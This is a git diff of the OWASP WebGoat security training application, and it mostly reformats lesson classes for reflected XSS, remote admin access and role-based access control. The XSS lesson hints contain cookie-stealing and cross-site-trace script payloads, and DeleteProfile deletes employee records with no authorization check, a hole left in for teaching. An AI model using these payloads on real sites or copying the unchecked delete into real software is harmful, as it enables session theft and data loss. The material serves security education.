.addElement("Enter your three digit access code:")); - tr.addElement(new TD().addElement("")); - //tr.addElement(new TD().addElement(new Input(Input.TEXT, "field1",param1))); - t.addElement(tr); - - Element b = ECSFactory.makeButton("Purchase"); - tr = new TR(); - tr.addElement(new TD().addElement(b).setColSpan(2).setAlign( - "center")); - t.addElement(tr); - - ec.addElement(t); - ec.addElement(new BR()); - ec.addElement(new HR().setWidth("90%")); + return (ec); } - catch (Exception e) + + /** + * DOCUMENT ME! + * + * @return DOCUMENT ME! + */ + protected Category getDefaultCategory() { - s.setMessage("Error generating " + this.getClass().getName()); - e.printStackTrace(); + return Category.XSS; } - return (ec); - } + /** + * Gets the hints attribute of the AccessControlScreen object + * + * @return The hints value + */ + protected List getHints(WebSession s) + { + List hints = new ArrayList(); + hints.add("A simple script is <SCRIPT>alert('bang!');</SCRIPT>."); + hints.add("Can you get the script to disclose the JSESSIONID cookie?"); + hints.add("You can use <SCRIPT>alert(document.cookie);</SCRIPT> to access the session id cookie"); + hints.add("Can you get the script to access the credit card form field?"); + hints + .add("Try a cross site trace (XST) Command:
" + + "<script type=\"text/javascript\">if ( navigator.appName.indexOf(\"Microsoft\") !=-1)" + + " {var xmlHttp = new ActiveXObject(\"Microsoft.XMLHTTP\");xmlHttp.open(\"TRACE\", \"./\", false);" + + " xmlHttp.send();str1=xmlHttp.responseText; while (str1.indexOf(\"\\n\") > -1) str1 = str1.replace(\"\\n\",\"<br>\"); " + + "document.write(str1);}</script>"); + return hints; + } - /** - * DOCUMENT ME! - * - * @return DOCUMENT ME! - */ - protected Category getDefaultCategory() - { - return Category.XSS; - } + // + /** + * Gets the instructions attribute of the WeakAccessControl object + * + * @return The instructions value + */ + public String getInstructions(WebSession s) + { + String instructions = "For this exercise, your mission is to come up with some input containing a script. You have to try to get this page to reflect that input back to your browser, which will execute the script and do something bad."; + return (instructions); + } + private final static Integer DEFAULT_RANKING = new Integer(120); - /** - * Gets the hints attribute of the AccessControlScreen object - * - * @return The hints value - */ - protected List getHints(WebSession s) - { - List hints = new ArrayList(); - hints - .add("A simple script is <SCRIPT>alert('bang!');</SCRIPT>."); - hints.add("Can you get the script to disclose the JSESSIONID cookie?"); - hints - .add("You can use <SCRIPT>alert(document.cookie);</SCRIPT> to access the session id cookie"); - hints - .add("Can you get the script to access the credit card form field?"); - hints - .add("Try a cross site trace (XST) Command:
" - + "<script type=\"text/javascript\">if ( navigator.appName.indexOf(\"Microsoft\") !=-1)" - + " {var xmlHttp = new ActiveXObject(\"Microsoft.XMLHTTP\");xmlHttp.open(\"TRACE\", \"./\", false);" - + " xmlHttp.send();str1=xmlHttp.responseText; while (str1.indexOf(\"\\n\") > -1) str1 = str1.replace(\"\\n\",\"<br>\"); " - + "document.write(str1);}</script>"); - return hints; - } + protected Integer getDefaultRanking() + { + return DEFAULT_RANKING; + } + /** + * Gets the title attribute of the AccessControlScreen object + * + * @return The title value + */ + public String getTitle() + { + return "Reflected XSS Attacks"; + } - // - /** - * Gets the instructions attribute of the WeakAccessControl object - * - * @return The instructions value - */ - public String getInstructions(WebSession s) - { - String instructions = "For this exercise, your mission is to come up with some input containing a script. You have to try to get this page to reflect that input back to your browser, which will execute the script and do something bad."; - return (instructions); - } - - private final static Integer DEFAULT_RANKING = new Integer(120); - - - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } - - - /** - * Gets the title attribute of the AccessControlScreen object - * - * @return The title value - */ - public String getTitle() - { - return "Reflected XSS Attacks"; - } - } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/RemoteAdminFlaw.java b/main/project/JavaSource/org/owasp/webgoat/lessons/RemoteAdminFlaw.java index 2d673d925..81d1f9e63 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/RemoteAdminFlaw.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/RemoteAdminFlaw.java 
@@ -1,115 +1,112 @@ + package org.owasp.webgoat.lessons; import java.util.ArrayList; import java.util.List; - import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if
+ not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ 02111-1307, USA.
*
*
* Getting Source ==============
*
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
*
* For details, please see http://code.google.com/p/webgoat/
- *
- * @author Bruce Mayhew WebGoat
- * @created October 28, 2003
+ *
+ * @author Bruce Mayhew WebGoat
+ * @created October 28, 2003
*/
public class RemoteAdminFlaw extends LessonAdapter
{
- /**
- * Description of the Method
- *
- * @param s Description of the Parameter
- * @return Description of the Return Value
- */
- protected Element createContent(WebSession s)
- {
+ /**
+ * Description of the Method
+ *
+ * @param s
+ * Description of the Parameter
+ * @return Description of the Return Value
+ */
+ protected Element createContent(WebSession s)
+ {
ElementContainer ec = new ElementContainer();
-
+
if (s.completedHackableAdmin())
{
- makeSuccess(s);
+ makeSuccess(s);
}
else
{
- ec.addElement("WebGoat has an admin interface. 
To 'complete' this lesson you must figure "
+ + "out how to access the administrative interface for WebGoat.");
}
return ec;
- }
+ }
+ /**
+ * Gets the category attribute of the ForgotPassword object
+ *
+ * @return The category value
+ */
+ protected Category getDefaultCategory()
+ {
+ return Category.ACCESS_CONTROL;
+ }
- /**
- * Gets the category attribute of the ForgotPassword object
- *
- * @return The category value
- */
- protected Category getDefaultCategory()
- {
- return Category.ACCESS_CONTROL;
- }
+ /**
+ * Gets the hints attribute of the HelloScreen object
+ *
+ * @return The hints value
+ */
+ public List getHints(WebSession s)
+ {
+ List hints = new ArrayList();
+ hints.add("WebGoat has 2 admin interfaces.");
+ hints.add("WebGoat has one admin interface that is controlled via a URL parameter and is 'hackable'");
+ hints
+ .add("WebGoat has one admin interface that is controlled via server side security constraints and should not be 'hackable'");
+ hints.add("Follow the Source!");
+ return hints;
+ }
- /**
- * Gets the hints attribute of the HelloScreen object
- *
- * @return The hints value
- */
- public List getHints(WebSession s)
- {
- List hints = new ArrayList();
- hints.add("WebGoat has 2 admin interfaces.");
- hints.add("WebGoat has one admin interface that is controlled via a URL parameter and is 'hackable'");
- hints.add("WebGoat has one admin interface that is controlled via server side security constraints and should not be 'hackable'");
- hints.add("Follow the Source!");
+ private final static Integer DEFAULT_RANKING = new Integer(160);
- return hints;
- }
+ protected Integer getDefaultRanking()
+ {
+ return DEFAULT_RANKING;
+ }
- private final static Integer DEFAULT_RANKING = new Integer(160);
-
-
- protected Integer getDefaultRanking()
- {
- return DEFAULT_RANKING;
- }
-
-
- /**
- * Gets the title attribute of the HelloScreen object
- *
- * @return The title value
- */
- public String getTitle()
- {
- return ("Remote Admin Access");
- }
+ /**
+ * Gets the title attribute of the HelloScreen object
+ *
+ * @return The title value
+ */
+ public String getTitle()
+ {
+ return ("Remote Admin Access");
+ }
}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/DeleteProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/DeleteProfile.java
index 0a21282c1..9550f533e 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/DeleteProfile.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/DeleteProfile.java
@@ -1,9 +1,9 @@
+
package org.owasp.webgoat.lessons.RoleBasedAccessControl;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
-
import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
@@ -13,167 +13,143 @@ import org.owasp.webgoat.session.UnauthorizedException; import org.owasp.webgoat.session.ValidationException; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ */ public class DeleteProfile extends DefaultLessonAction { - private LessonAction chainedAction; + private LessonAction chainedAction; - - public DeleteProfile(GoatHillsFinancial lesson, String lessonName, - String actionName, LessonAction chainedAction) - { - super(lesson, lessonName, actionName); - this.chainedAction = chainedAction; - } - - - public void handleRequest(WebSession s) throws ParameterNotFoundException, - UnauthenticatedException, UnauthorizedException, - ValidationException - { - getLesson().setCurrentAction(s, getActionName()); - - int userId = getIntSessionAttribute(s, getLessonName() + "." 
- + RoleBasedAccessControl.USER_ID);
- int employeeId = s.getParser().getIntParameter(
- RoleBasedAccessControl.EMPLOYEE_ID);
-
- if (isAuthenticated(s))
+ public DeleteProfile(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction)
{
- deleteEmployeeProfile(s, userId, employeeId);
-
- try
- {
- chainedAction.handleRequest(s);
- }
- catch (UnauthenticatedException ue1)
- {
- System.out.println("Internal server error");
- ue1.printStackTrace();
- }
- catch (UnauthorizedException ue2)
- {
- System.out.println("Internal server error");
- ue2.printStackTrace();
- }
+ super(lesson, lessonName, actionName);
+ this.chainedAction = chainedAction;
}
- else
- throw new UnauthenticatedException();
- updateLessonStatus(s);
- }
-
-
- public String getNextPage(WebSession s)
- {
- return RoleBasedAccessControl.LISTSTAFF_ACTION;
- }
-
-
- public void deleteEmployeeProfile(WebSession s, int userId, int employeeId)
- throws UnauthorizedException
- {
- try
+ public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
+ UnauthorizedException, ValidationException
{
- // Note: The password field is ONLY set by ChangePassword
- String query = "DELETE FROM employee WHERE userid = " + employeeId;
- //System.out.println("Query: " + query);
- try
- {
- Statement statement = WebSession.getConnection(s)
- .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
- ResultSet.CONCUR_READ_ONLY);
- statement.executeUpdate(query);
- }
- catch (SQLException sqle)
- {
- s.setMessage("Error deleting employee profile");
- sqle.printStackTrace();
- }
+ getLesson().setCurrentAction(s, getActionName());
+
+ int userId = getIntSessionAttribute(s, getLessonName() + "." 
+ RoleBasedAccessControl.USER_ID);
+ int employeeId = s.getParser().getIntParameter(RoleBasedAccessControl.EMPLOYEE_ID);
+
+ if (isAuthenticated(s))
+ {
+ deleteEmployeeProfile(s, userId, employeeId);
+
+ try
+ {
+ chainedAction.handleRequest(s);
+ } catch (UnauthenticatedException ue1)
+ {
+ System.out.println("Internal server error");
+ ue1.printStackTrace();
+ } catch (UnauthorizedException ue2)
+ {
+ System.out.println("Internal server error");
+ ue2.printStackTrace();
+ }
+ }
+ else
+ throw new UnauthenticatedException();
+
+ updateLessonStatus(s);
}
- catch (Exception e)
+
+ public String getNextPage(WebSession s)
{
- s.setMessage("Error deleting employee profile");
- e.printStackTrace();
+ return RoleBasedAccessControl.LISTSTAFF_ACTION;
}
- }
-
- public void deleteEmployeeProfile_BACKUP(WebSession s, int userId,
- int employeeId) throws UnauthorizedException
- {
- try
+ public void deleteEmployeeProfile(WebSession s, int userId, int employeeId) throws UnauthorizedException
{
- // Note: The password field is ONLY set by ChangePassword
- String query = "DELETE FROM employee WHERE userid = " + employeeId;
- //System.out.println("Query: " + query);
- try
- {
- Statement statement = WebSession.getConnection(s)
- .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
- ResultSet.CONCUR_READ_ONLY);
- statement.executeUpdate(query);
- }
- catch (SQLException sqle)
- {
- s.setMessage("Error deleting employee profile");
- sqle.printStackTrace();
- }
+ try
+ {
+ // Note: The password field is ONLY set by ChangePassword
+ String query = "DELETE FROM employee WHERE userid = " + employeeId;
+ // System.out.println("Query: " + query);
+ try
+ {
+ Statement statement = WebSession.getConnection(s).createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+ ResultSet.CONCUR_READ_ONLY);
+ statement.executeUpdate(query);
+ } catch (SQLException sqle)
+ {
+ s.setMessage("Error deleting employee profile");
+ sqle.printStackTrace();
+ }
+ } catch (Exception e)
+ {
+ s.setMessage("Error 
deleting employee profile");
+ e.printStackTrace();
+ }
}
- catch (Exception e)
+
+ public void deleteEmployeeProfile_BACKUP(WebSession s, int userId, int employeeId) throws UnauthorizedException
{
- s.setMessage("Error deleting employee profile");
- e.printStackTrace();
+ try
+ {
+ // Note: The password field is ONLY set by ChangePassword
+ String query = "DELETE FROM employee WHERE userid = " + employeeId;
+ // System.out.println("Query: " + query);
+ try
+ {
+ Statement statement = WebSession.getConnection(s).createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+ ResultSet.CONCUR_READ_ONLY);
+ statement.executeUpdate(query);
+ } catch (SQLException sqle)
+ {
+ s.setMessage("Error deleting employee profile");
+ sqle.printStackTrace();
+ }
+ } catch (Exception e)
+ {
+ s.setMessage("Error deleting employee profile");
+ e.printStackTrace();
+ }
}
- }
-
- private void updateLessonStatus(WebSession s)
- {
- // If the logged in user is not authorized to be here, stage 1 is complete.
- if (RoleBasedAccessControl.STAGE1.equals(getStage(s)))
- try
+ private void updateLessonStatus(WebSession s)
{
- int userId = getIntSessionAttribute(s, getLessonName() + "."
- + RoleBasedAccessControl.USER_ID);
+ // If the logged in user is not authorized to be here, stage 1 is complete.
+ if (RoleBasedAccessControl.STAGE1.equals(getStage(s))) try
+ {
+ int userId = getIntSessionAttribute(s, getLessonName() + "." + RoleBasedAccessControl.USER_ID);
- if (!isAuthorized(s, userId,
- RoleBasedAccessControl.DELETEPROFILE_ACTION))
- {
- setStageComplete(s, RoleBasedAccessControl.STAGE1);
- }
+ if (!isAuthorized(s, userId, RoleBasedAccessControl.DELETEPROFILE_ACTION))
+ {
+ setStageComplete(s, RoleBasedAccessControl.STAGE1);
+ }
+ } catch (ParameterNotFoundException e)
+ {
+ }
}
- catch (ParameterNotFoundException e)
- {}
- }
}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/EditProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/EditProfile.java index 544e1786f..bbc25d502 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/EditProfile.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/EditProfile.java @@ -1,9 +1,9 @@ + package org.owasp.webgoat.lessons.RoleBasedAccessControl; import java.sql.PreparedStatement; import java.sql.ResultSet; import java.sql.SQLException; - import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction; import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial; import org.owasp.webgoat.session.Employee; 
@@ -12,187 +12,154 @@ import org.owasp.webgoat.session.UnauthenticatedException; import org.owasp.webgoat.session.UnauthorizedException; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ */ public class EditProfile extends DefaultLessonAction { - public EditProfile(GoatHillsFinancial lesson, String lessonName, - String actionName) - { - super(lesson, lessonName, actionName); - } - - - public void handleRequest(WebSession s) throws ParameterNotFoundException, - UnauthenticatedException, UnauthorizedException - { - getLesson().setCurrentAction(s, getActionName()); - - if (isAuthenticated(s)) + public EditProfile(GoatHillsFinancial lesson, String lessonName, String actionName) { - int userId = getUserId(s); - int employeeId = s.getParser().getIntParameter( - RoleBasedAccessControl.EMPLOYEE_ID); - - Employee employee = getEmployeeProfile(s, userId, employeeId); - setSessionAttribute(s, getLessonName() + "." 
- + RoleBasedAccessControl.EMPLOYEE_ATTRIBUTE_KEY, employee); + super(lesson, lessonName, actionName); } - else - throw new UnauthenticatedException(); - } - - public String getNextPage(WebSession s) - { - return RoleBasedAccessControl.EDITPROFILE_ACTION; - } - - - public Employee getEmployeeProfile(WebSession s, int userId, - int subjectUserId) throws UnauthorizedException - { - Employee profile = null; - - // Query the database for the profile data of the given employee - try + public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException, + UnauthorizedException { - String query = "SELECT * FROM employee WHERE userid = ?"; + getLesson().setCurrentAction(s, getActionName()); - try - { - PreparedStatement answer_statement = WebSession - .getConnection(s).prepareStatement(query, - ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - answer_statement.setInt(1, subjectUserId); - ResultSet answer_results = answer_statement.executeQuery(); - if (answer_results.next()) + if (isAuthenticated(s)) { - // Note: Do NOT get the password field. 
- profile = new Employee(answer_results.getInt("userid"), - answer_results.getString("first_name"), - answer_results.getString("last_name"), - answer_results.getString("ssn"), answer_results - .getString("title"), answer_results - .getString("phone"), answer_results - .getString("address1"), answer_results - .getString("address2"), answer_results - .getInt("manager"), answer_results - .getString("start_date"), answer_results - .getInt("salary"), answer_results - .getString("ccn"), answer_results - .getInt("ccn_limit"), answer_results - .getString("disciplined_date"), - answer_results.getString("disciplined_notes"), - answer_results.getString("personal_description")); - /* System.out.println("Retrieved employee from db: " + - profile.getFirstName() + " " + profile.getLastName() + - " (" + profile.getId() + ")"); - */} - } - catch (SQLException sqle) - { - s.setMessage("Error getting employee profile"); - sqle.printStackTrace(); - } - } - catch (Exception e) - { - s.setMessage("Error getting employee profile"); - e.printStackTrace(); + int userId = getUserId(s); + int employeeId = s.getParser().getIntParameter(RoleBasedAccessControl.EMPLOYEE_ID); + + Employee employee = getEmployeeProfile(s, userId, employeeId); + setSessionAttribute(s, getLessonName() + "." 
+ RoleBasedAccessControl.EMPLOYEE_ATTRIBUTE_KEY, employee); + } + else + throw new UnauthenticatedException(); } - return profile; - } - - - public Employee getEmployeeProfile_BACKUP(WebSession s, int userId, - int subjectUserId) throws UnauthorizedException - { - // Query the database to determine if this employee has access to this function - // Query the database for the profile data of the given employee if "owned" by the given user - - Employee profile = null; - - // Query the database for the profile data of the given employee - try + public String getNextPage(WebSession s) { - String query = "SELECT * FROM employee WHERE userid = ?"; + return RoleBasedAccessControl.EDITPROFILE_ACTION; + } - try - { - PreparedStatement answer_statement = WebSession - .getConnection(s).prepareStatement(query, - ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - answer_statement.setInt(1, subjectUserId); - ResultSet answer_results = answer_statement.executeQuery(); - if (answer_results.next()) + public Employee getEmployeeProfile(WebSession s, int userId, int subjectUserId) throws UnauthorizedException + { + Employee profile = null; + + // Query the database for the profile data of the given employee + try { - // Note: Do NOT get the password field. 
- profile = new Employee(answer_results.getInt("userid"), - answer_results.getString("first_name"), - answer_results.getString("last_name"), - answer_results.getString("ssn"), answer_results - .getString("title"), answer_results - .getString("phone"), answer_results - .getString("address1"), answer_results - .getString("address2"), answer_results - .getInt("manager"), answer_results - .getString("start_date"), answer_results - .getInt("salary"), answer_results - .getString("ccn"), answer_results - .getInt("ccn_limit"), answer_results - .getString("disciplined_date"), - answer_results.getString("disciplined_notes"), - answer_results.getString("personal_description")); - /* System.out.println("Retrieved employee from db: " + - profile.getFirstName() + " " + profile.getLastName() + - " (" + profile.getId() + ")"); - */} - } - catch (SQLException sqle) - { - s.setMessage("Error getting employee profile"); - sqle.printStackTrace(); - } - } - catch (Exception e) - { - s.setMessage("Error getting employee profile"); - e.printStackTrace(); + String query = "SELECT * FROM employee WHERE userid = ?"; + + try + { + PreparedStatement answer_statement = WebSession.getConnection(s) + .prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); + answer_statement.setInt(1, subjectUserId); + ResultSet answer_results = answer_statement.executeQuery(); + if (answer_results.next()) + { + // Note: Do NOT get the password field. 
+ profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"), + answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results + .getString("title"), answer_results.getString("phone"), answer_results + .getString("address1"), answer_results.getString("address2"), answer_results + .getInt("manager"), answer_results.getString("start_date"), answer_results + .getInt("salary"), answer_results.getString("ccn"), answer_results + .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results + .getString("disciplined_notes"), answer_results.getString("personal_description")); + /* + * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " + + * profile.getLastName() + " (" + profile.getId() + ")"); + */} + } catch (SQLException sqle) + { + s.setMessage("Error getting employee profile"); + sqle.printStackTrace(); + } + } catch (Exception e) + { + s.setMessage("Error getting employee profile"); + e.printStackTrace(); + } + + return profile; } - return profile; - } + public Employee getEmployeeProfile_BACKUP(WebSession s, int userId, int subjectUserId) throws UnauthorizedException + { + // Query the database to determine if this employee has access to this function + // Query the database for the profile data of the given employee if "owned" by the given + // user + + Employee profile = null; + + // Query the database for the profile data of the given employee + try + { + String query = "SELECT * FROM employee WHERE userid = ?"; + + try + { + PreparedStatement answer_statement = WebSession.getConnection(s) + .prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); + answer_statement.setInt(1, subjectUserId); + ResultSet answer_results = answer_statement.executeQuery(); + if (answer_results.next()) + { + // Note: Do NOT get the password field. 
+ profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"), + answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results + .getString("title"), answer_results.getString("phone"), answer_results + .getString("address1"), answer_results.getString("address2"), answer_results + .getInt("manager"), answer_results.getString("start_date"), answer_results + .getInt("salary"), answer_results.getString("ccn"), answer_results + .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results + .getString("disciplined_notes"), answer_results.getString("personal_description")); + /* + * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " + + * profile.getLastName() + " (" + profile.getId() + ")"); + */} + } catch (SQLException sqle) + { + s.setMessage("Error getting employee profile"); + sqle.printStackTrace(); + } + } catch (Exception e) + { + s.setMessage("Error getting employee profile"); + e.printStackTrace(); + } + + return profile; + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/RoleBasedAccessControl.java b/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/RoleBasedAccessControl.java index cdc541c22..c4b8aaf55 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/RoleBasedAccessControl.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/RoleBasedAccessControl.java @@ -1,8 +1,8 @@ + package org.owasp.webgoat.lessons.RoleBasedAccessControl; import java.util.ArrayList; import java.util.List; - import org.apache.ecs.ElementContainer; import org.owasp.webgoat.lessons.Category; import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction; 
@@ -19,426 +19,400 @@ import org.owasp.webgoat.session.UnauthorizedException; import org.owasp.webgoat.session.ValidationException; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ */ public class RoleBasedAccessControl extends GoatHillsFinancial { - private final static Integer DEFAULT_RANKING = new Integer(125); + private final static Integer DEFAULT_RANKING = new Integer(125); - public final static String STAGE1 = "Bypass Business Layer Access Control"; - - public final static String STAGE2 = "Add Business Layer Access Control"; - - public final static String STAGE3 = "Bypass Data Layer Access Control"; - - public final static String STAGE4 = "Add Data Layer Access Control"; + public final static String STAGE1 = "Bypass Business Layer Access Control"; - protected void registerActions(String className) { - registerAction(new ListStaff(this, className, LISTSTAFF_ACTION)); - registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION)); - registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION)); - registerAction(new EditProfile(this, className, EDITPROFILE_ACTION)); - registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION)); + public final static String STAGE2 = "Add Business Layer Access Control"; - // These actions are special in that they chain to other actions. 
- registerAction(new Login(this, className, LOGIN_ACTION, - getAction(LISTSTAFF_ACTION))); - registerAction(new Logout(this, className, LOGOUT_ACTION, - getAction(LOGIN_ACTION))); - registerAction(new FindProfile(this, className, FINDPROFILE_ACTION, - getAction(VIEWPROFILE_ACTION))); - registerAction(new UpdateProfile(this, className, - UPDATEPROFILE_ACTION, getAction(VIEWPROFILE_ACTION))); - registerAction(new DeleteProfile(this, className, - DELETEPROFILE_ACTION, getAction(LISTSTAFF_ACTION))); - } + public final static String STAGE3 = "Bypass Data Layer Access Control"; - /** - * Gets the category attribute of the CommandInjection object - * - * @return The category value - */ - public Category getDefaultCategory() - { - return Category.ACCESS_CONTROL; - } + public final static String STAGE4 = "Add Data Layer Access Control"; - /** - * Gets the hints attribute of the DirectoryScreen object - * - * @return The hints value - */ - protected List getHints(WebSession s) - { - List hints = new ArrayList(); - hints - .add("Many sites attempt to restrict access to resources by role."); - hints - .add("Developers frequently make mistakes implementing this scheme."); - hints.add("Attempt combinations of users, roles, and resources."); + protected void 